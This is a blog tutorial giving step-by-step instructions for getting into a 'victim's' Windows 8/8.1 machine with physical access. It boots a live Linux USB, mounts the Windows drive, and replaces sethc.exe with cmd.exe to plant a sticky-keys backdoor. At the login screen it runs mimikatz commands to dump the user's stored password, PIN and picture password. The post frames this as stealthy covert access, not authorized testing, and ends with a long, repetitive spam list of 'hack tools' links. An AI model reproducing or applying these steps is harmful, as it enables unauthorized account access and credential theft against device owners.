Translate

quinta-feira, 25 de janeiro de 2024

Cracking Windows 8/8.1 Passwords With Mimikatz



You Might have read my previous posts about how to remove windows passwords using chntpw and might be thinking why am I writing another tutorial to do the same thing! Well today we are not going to remove the windows user password rather we are going to be more stealth in that we are not going to remove it rather we are going to know what is the users password and access his/her account with his/her own password. Sounds nice...


Requirements:


  1. A live bootable linux OS (I'm using Kali Linux)(Download Kali Linux)
  2. Mimikatz (Download | Blog)
  3. Physical Access to victim's machine
  4. A Working Brain in that Big Head (Download Here)



Steps:

1. First of all download mimikatz and put it in a pendrive.

2. Boat the victim's PC with your live bootable Pendrive (Kali Linux on pendrive in my case). And open a terminal window

3. Mount the Volume/Drive on which windows 8/8.1 is installed by typing these commands
in the terminal window:

mkdir /media/win
ntfs-3g /dev/sda1 /media/win

[NOTE] ntfs-3g is used to mount an NTFS drive in Read/Write mode otherwise you might not be able to write on the drive. Also /dev/sda1 is the name of the drive on which Windows OS is installed, to list your drives you can use lsblk -l or fdisk -l. The third flag is the location where the drive will be mounted.

4. Now navigate to the System32 folder using the following command

cd /media/win/Windows/System32

5. After navigating to the System32 rename the sethc.exe file to sethc.exe.bak by typing the following command:

mv sethc.exe sethc.exe.bak

sethc.exe is a windows program which runs automatically after shift-key is pressed more than 5 times continuously.

6. Now copy the cmd.exe program to sethc.exe replacing the original sethc.exe program using this command:

cp cmd.exe sethc.exe

[Note] We made a backup of sethc.exe program so that we can restore the original sethc.exe functionality

7. With this, we are done with the hard part of the hack now lets reboot the system and boot our Victim's Windows 8/8.1 OS.

8. After reaching the Windows Login Screen plugin the usb device with mimikatz on it and hit shift-key continuously five or more times. It will bring up a command prompt like this





9. Now navigate to your usb drive in my case its drive G:




10. Now navigate to the proper version of mimikatz binary folder (Win32 for32bit windows and x64 for 64 bit windows)


11. Run mimikatz and type the following commands one after the other in sequence:

privilege::debug
token::elevate
vault::list

the first command enables debug mode
the second one elevates the privilages
the last one lists the passwords which include picture password and pin (if set by the user)









That's it you got the password and everything else needed to log into the system. No more breaking and mess making its simple its easy and best of all its not Noisy lol...

Hope you enjoyed the tutorial have fun :)

Related articles


  1. Hack Tools
  2. Free Pentest Tools For Windows
  3. Pentest Tools For Mac
  4. Install Pentest Tools Ubuntu
  5. Hacker Tools Github
  6. Hacker Tools Free
  7. Hack Tools
  8. Pentest Tools Download
  9. Pentest Tools Windows
  10. Hacker Tools Software
  11. Pentest Tools Kali Linux
  12. Hacking Tools Pc
  13. Hack Tools
  14. Hacking Tools For Windows 7
  15. Nsa Hack Tools
  16. Hack Tools Mac
  17. Hack Tools For Windows
  18. Hacker Tools Free Download
  19. Hacking Tools For Windows
  20. Hack Tool Apk
  21. Wifi Hacker Tools For Windows
  22. Hackers Toolbox
  23. Ethical Hacker Tools
  24. Hacking Tools 2019
  25. Hacking Tools 2019
  26. Hack Tools
  27. New Hack Tools
  28. Termux Hacking Tools 2019
  29. Top Pentest Tools
  30. Hack Tools Pc
  31. Hacking Tools Windows 10
  32. Termux Hacking Tools 2019
  33. Computer Hacker
  34. Hacker Tools
  35. Pentest Tools Open Source
  36. Tools For Hacker
  37. What Are Hacking Tools
  38. World No 1 Hacker Software
  39. Hacking Tools And Software
  40. Pentest Tools Alternative
  41. Hack Tool Apk No Root
  42. Hacking Tools Github
  43. Pentest Tools Open Source
  44. Pentest Tools Nmap
  45. Pentest Tools Windows
  46. Hacker Tools 2020
  47. Hacker Tools Software
  48. Hack Tools Pc
  49. How To Hack
  50. Hacking Tools And Software
  51. Pentest Tools For Windows
  52. Pentest Box Tools Download
  53. Hacker Tools Apk Download
  54. Hacking Tools Free Download
  55. Growth Hacker Tools
  56. Hacker Tools Windows
  57. Pentest Tools Website Vulnerability
  58. How To Make Hacking Tools
  59. Pentest Tools Download
  60. Hacking Tools Software
  61. Hacking Tools For Windows Free Download
  62. Hack Tools Mac
  63. Pentest Tools For Ubuntu
  64. Hack Tool Apk
  65. Pentest Tools For Ubuntu
  66. Hacker Tools For Pc
  67. Hack And Tools
  68. Hack And Tools
  69. Hacking Tools Free Download
  70. Pentest Tools List
  71. Hacking Tools For Windows 7
  72. Hacking Tools For Windows Free Download
  73. Hacker Tools List
  74. Wifi Hacker Tools For Windows
  75. Game Hacking
  76. Hacker Tools For Mac
  77. Hack Apps
  78. Pentest Tools For Mac
  79. Hacker Tools
  80. Computer Hacker
  81. Hacking Tools Download
  82. Pentest Tools List
  83. Nsa Hacker Tools
  84. Hacker Tools For Mac
  85. Hacker Tools Online
  86. Pentest Tools Website Vulnerability
  87. Hacking Tools And Software
  88. Pentest Tools Linux
  89. Best Hacking Tools 2020
  90. Hacker Tools Online
  91. Pentest Tools Alternative
  92. Pentest Tools Bluekeep
  93. Hack Tools 2019
  94. Pentest Tools Linux
  95. Hacking Apps
  96. Hacking Tools 2020
  97. Computer Hacker
  98. Hack Tools For Mac
  99. Hack App
  100. Pentest Recon Tools
  101. Android Hack Tools Github
  102. Nsa Hacker Tools
  103. How To Make Hacking Tools
  104. Tools For Hacker
  105. Hacker Tools Github
  106. Pentest Tools Url Fuzzer
  107. Pentest Tools
  108. Wifi Hacker Tools For Windows
  109. Hacker Tools Mac
  110. Pentest Tools Website Vulnerability
  111. How To Make Hacking Tools
  112. Hacking Tools For Games
  113. Nsa Hack Tools
  114. Pentest Tools Download
  115. Hack Apps
  116. Hacking Tools Software
  117. Pentest Tools Find Subdomains
  118. Hack App
  119. Hacker Tools List

Arquivo do blog